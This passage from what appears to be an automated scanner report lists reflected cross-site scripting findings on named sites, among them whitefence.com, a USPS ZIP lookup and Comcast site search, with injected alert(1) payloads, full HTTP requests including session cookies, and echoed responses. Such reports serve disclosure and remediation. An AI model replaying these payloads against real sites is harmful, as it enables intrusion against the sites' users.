body.home-phone83293--><img src=a onerror=alert(1)>7f06d62cba0 div#body div.description {
background: url(/objects/images/catBacks/980/home-phone83293-->
...[SNIP]...

2.111. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7221"><img%20src%3da%20onerror%3dalert(1)>c8180e62a13 was submitted in the REST URL parameter 2. This input was echoed as a7221"><img src=a onerror=alert(1)>c8180e62a13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/home-phonea7221"><img%20src%3da%20onerror%3dalert(1)>c8180e62a13/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 11:52:33 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<body class="category-view home-phonea7221"><img src=a onerror=alert(1)>c8180e62a13">
...[SNIP]...

2.112. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebbf4"%3b39adcd537fe was submitted in the REST URL parameter 2. This input was echoed as ebbf4";39adcd537fe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/home-phoneebbf4"%3b39adcd537fe/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 11:52:34 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--

s.pageName="WF-Category-View-Home-phoneebbf4";39adcd537fe";
s.eVar1="1039547";

if(typeof(_vis_opt_settings_loaded) == "boolean"){
var _combination = _vis_opt_readCookie('_vis_opt_exp_'+_vis_opt_experiment_id+'_combi');
if(typeof(_v
...[SNIP]...

2.113. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/service-tips/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1a49"%3b5c895c7b51d was submitted in the REST URL parameter 2. This input was echoed as c1a49";5c895c7b51d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/service-tipsc1a49"%3b5c895c7b51d/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.2.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 11:59:52 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--

s.pageName="WF-Category-View-Service-tipsc1a49";5c895c7b51d";
s.eVar1="1039547";

if(typeof(_vis_opt_settings_loaded) == "boolean"){
var _combination = _vis_opt_readCookie('_vis_opt_exp_'+_vis_opt_experiment_id+'_combi');
if(typeof(_v
...[SNIP]...

2.114. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/service-tips/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 2775b--><img%20src%3da%20onerror%3dalert(1)>67292b8abf7 was submitted in the REST URL parameter 2. This input was echoed as 2775b--><img src=a onerror=alert(1)>67292b8abf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/service-tips2775b--><img%20src%3da%20onerror%3dalert(1)>67292b8abf7/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.2.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:01 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--
body.service-tips2775b--><img src=a onerror=alert(1)>67292b8abf7 div#body div.description {
background: url(/objects/images/catBacks/980/service-tips2775b-->
...[SNIP]...

2.115. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/service-tips/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45eaa"><img%20src%3da%20onerror%3dalert(1)>353edce96bc was submitted in the REST URL parameter 2. This input was echoed as 45eaa"><img src=a onerror=alert(1)>353edce96bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/service-tips45eaa"><img%20src%3da%20onerror%3dalert(1)>353edce96bc/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.2.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 11:59:51 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<body class="category-view service-tips45eaa"><img src=a onerror=alert(1)>353edce96bc">
...[SNIP]...

2.116. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfd67"%3b5b4986bfa6d was submitted in the REST URL parameter 2. This input was echoed as cfd67";5b4986bfa6d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/television-servicecfd67"%3b5b4986bfa6d/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:36 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--

s.pageName="WF-Category-View-Television-servicecfd67";5b4986bfa6d";
s.eVar1="1039547";

if(typeof(_vis_opt_settings_loaded) == "boolean"){
var _combination = _vis_opt_readCookie('_vis_opt_exp_'+_vis_opt_experiment_id+'_combi');
if(typeof(_v
...[SNIP]...

2.117. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 7b890--><img%20src%3da%20onerror%3dalert(1)>42ef7191050 was submitted in the REST URL parameter 2. This input was echoed as 7b890--><img src=a onerror=alert(1)>42ef7191050 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/television-service7b890--><img%20src%3da%20onerror%3dalert(1)>42ef7191050/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:45 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<!--
body.television-service7b890--><img src=a onerror=alert(1)>42ef7191050 div#body div.description {
background: url(/objects/images/catBacks/980/television-service7b890-->
...[SNIP]...

2.118. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3d74"><img%20src%3da%20onerror%3dalert(1)>6e8945171be was submitted in the REST URL parameter 2. This input was echoed as e3d74"><img src=a onerror=alert(1)>6e8945171be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/television-servicee3d74"><img%20src%3da%20onerror%3dalert(1)>6e8945171be/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:00:35 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 48642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<body class="category-view television-servicee3d74"><img src=a onerror=alert(1)>6e8945171be">
...[SNIP]...

2.119. http://yp.frontierpages.com/results.aspx [term parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yp.frontierpages.com
Path:   /results.aspx

Issue detail

The value of the term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5b57"style%3d"x%3aexpression(alert(1))"d9518141ec5 was submitted in the term parameter. This input was echoed as d5b57"style="x:expression(alert(1))"d9518141ec5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?searchby=&Termsearch=true&Partnerid=BRY-01&Pagesize=0&Pagenumber=1&Portal=Frontier&term=d5b57"style%3d"x%3aexpression(alert(1))"d9518141ec5&city=Dallas&state=TX&zip= HTTP/1.1
Host: yp.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://www.frontierpages.com/region.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=cznpages%3D%2526pid%253Dfrontierpages.com/region.asp%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BreturnBusinessSearch%252528%252529%25253B%25257D%2526oidt%253D2%2526ot%253DIMG

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:52:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: userid=e65ce03b-e5b2-4548-b8bf-667efcdf3dc3; expires=Thu, 06-Sep-2012 12:52:29 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17616


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--<link href="
...[SNIP]...
<a href = "results.aspx?PageNumber=1&ListingID=&term=d5b57"style="x:expression(alert(1))"d9518141ec5&Address=&city=Dallas&State=TX&zip=&PageSize=25&Radius=50&ecs=true&sort=alpha&Heading=d5b57"style="x:expression(alert(1))"d9518141ec5&listingCount=0">
...[SNIP]...

2.120. http://zip4.usps.com/zip4/zcl_1_results.jsp [state parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://zip4.usps.com
Path:   /zip4/zcl_1_results.jsp

Issue detail

The value of the state request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 6b649><script>alert(1)</script>6471dcc488fb924b6 was submitted in the state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /zip4/zcl_1_results.jsp?visited=1&pagenumber=0&city=BARRE&state=VT6b649><script>alert(1)</script>6471dcc488fb924b6&submit.x=0&submit.y=0&submit=Find+ZIP+Code HTTP/1.1
Host: zip4.usps.com
Proxy-Connection: keep-alive
Referer: http://zip4.usps.com/zip4/citytown.jsp
Cache-Control: max-age=0
Origin: http://zip4.usps.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331562506:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html;charset=ISO-8859-1
Cache-Control:
Content-Length: 25869
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:53:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en">
<HEAD>
<title>USPS - ZIP Code Lookup</title>
<met
...[SNIP]...
<input tabindex="2" id="state" style="width:38px;" type="text" maxlength="2" name="state" value=VT6B649><SCRIPT>ALERT(1)</SCRIPT>6471DCC488FB924B6 onKeyPress="return validate_for_characters(this, event)"/>
...[SNIP]...

2.121. http://sitesearch.comcast.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sitesearch.comcast.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b36d</script><script>alert(1)</script>cf1b4e5a49c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; mbox=session#1315327839174-766376#1315330223|check#true#1315328423; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20s_dfa%3Dcomcastdotcomprod%7C1315330160518%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315330162478%3B; s_sess=%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20cf%3D0%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}
Referer: http://www.google.com/search?hl=en&q=8b36d</script><script>alert(1)</script>cf1b4e5a49c

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:23:27 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 18554
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
...[SNIP]...
ch - Version B";
s.events = "event11,event9";
s.eVar41 = "xss";
s.eVar34 = "Comcast.com Search - Version B";
s.prop18 = "xss";
s.prop19 = "http://www.google.com/search?hl=en&q=8b36d</script><script>alert(1)</script>cf1b4e5a49c";
s.pageName = "Search Results - Page 1";
s.eVar31 = s.pageName;
//s.pageName="";

switch ('com') {
case "help":
s.eVar42 = "help support";
brea
...[SNIP]...

2.122. http://www.whitefence.com/category/high-speed-internet/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490cf"><script>alert(1)</script>d506bb2c219 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category/high-speed-internet/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=490cf"><script>alert(1)</script>d506bb2c219
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:00:30 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 31565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.google.com/search?hl=en&q=490cf"><script>alert(1)</script>d506bb2c219" />
...[SNIP]...

2.123. http://www.whitefence.com/category/home-phone/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48394"><script>alert(1)</script>f4c68eaa46d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

